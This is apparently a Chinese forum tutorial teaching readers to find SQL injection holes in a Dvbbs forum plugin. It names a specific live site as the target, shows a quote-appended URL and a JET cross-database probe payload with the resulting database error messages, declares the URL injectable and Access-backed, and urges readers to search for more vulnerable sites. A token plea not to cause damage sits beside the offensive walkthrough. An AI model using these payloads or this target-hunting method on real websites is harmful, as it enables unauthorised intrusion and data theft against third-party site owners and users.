在百度搜索“dvbbs 社区法院”
我只提供大家一个思路，请大家别搞破坏哦！~
这里我已经找好一个了 http://www.723500.cn/bbs
现在我来教大家找动网插件的注入漏洞
首先一样得先注册
不好意思，我刚注册了个bangbang了，嘿嘿，注册这种事就不用演示了吧！~
大家看我怎么寻找漏洞
社区设施--社区法院---状纸清单
http://www.723500.cn/bbs/plus_fayuan_lookdisp.asp?ID=1随便打开一个状纸！~
接着我们来测试下，是否存在注入漏洞
http://www.723500.cn/bbs/plus_fayuan_lookdisp.asp?ID=1在后面加个 '
Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'ID=1'' 中。

/bbs/plus_fayuan_lookdisp.asp，行 11
看到了吧？嘿嘿，再把'改为%20or%200<>(select%20count(*)%20from%20c:\winnt\system32\cmd.exe.c)
Microsoft JET Database Engine 错误 '80004005'

'c:\winnt\system32\cmd.exe'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/bbs/plus_fayuan_lookdisp.asp，行 11
大家应该一看这个就知道这是MDB数据库，MDB数据库其实也可以跨库查询
这就给动网带来了很大的隐患，大家说是么？？ 嘎嘎 ：）
其实很多网站都存在这样的漏洞的，大家自己去找找就会发现的！~

恭喜,该URL可以注入!
数据库类型:Access数据库